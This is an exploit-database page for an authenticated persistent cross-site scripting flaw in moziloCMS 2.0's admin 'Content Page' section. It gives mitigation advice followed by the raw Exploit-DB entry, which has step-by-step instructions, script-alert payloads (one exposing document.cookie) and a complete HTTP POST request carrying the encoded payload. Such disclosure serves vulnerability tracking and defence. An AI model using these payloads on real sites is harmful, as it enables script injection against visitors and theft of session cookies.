header-logo
Suggest Exploit
vendor:
moziloCMS
by:
Abdulkadir Kaya
7.5
CVSS
HIGH
Persistent Cross-Site Scripting
79
CWE
Product Name: moziloCMS
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: a:mozilo:mozilocms:2.0
Metasploit:
Other Scripts:
Platforms Tested: Windows & WampServer
2020

moziloCMS 2.0 – Persistent Cross-Site Scripting (Authenticated)

This exploit allows an authenticated user to inject malicious code into the "Content Page" section of the admin panel in moziloCMS 2.0. The injected code will be executed whenever the content page is viewed, potentially allowing an attacker to steal sensitive information or perform other malicious actions.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before displaying it on the website. Additionally, implementing a Content Security Policy (CSP) can help prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-08-31
# Exploit Author: Abdulkadir Kaya
# Vendor Homepage: https://www.mozilo.de/
# Version: 2.0
# Tested on: Windows & WampServer

1- Go to following url. >> http://(HOST)/(PATH)/admin/
2- Login the admin panel. 
3- Go to "Content".
4- Write XSS payload in the "Content Page" section.
5- Save.

NOTE: Content Page must be in the Category.

((XSS Payloads))

1-<script>alert("XSS Confirmed");</script>
2-<script>alert(document.cookie);</script>
3-<script>alert(document.domain);</script>

(( REQUEST ))

POST /mozilo/admin/index.php HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8088/mozilo/admin/index.php?nojs=true&action=catpage&multi=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 269
Origin: http://127.0.0.1:8088
Connection: close
Cookie: mozilo_editor_settings=true,false,mozilo,12px; PHPSESSID=1jlbsfbodasafasl121chjv5947j0s; 
MOZILOID_875895d61510deasdfa1a7ad7cc6047f819=5tqsm5d5nvphqimdpqcnq4tqit

action=catpage&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E]
=%5BWilkommen%5D&changeart=cat_page_move&cat_page_change[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521
%2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D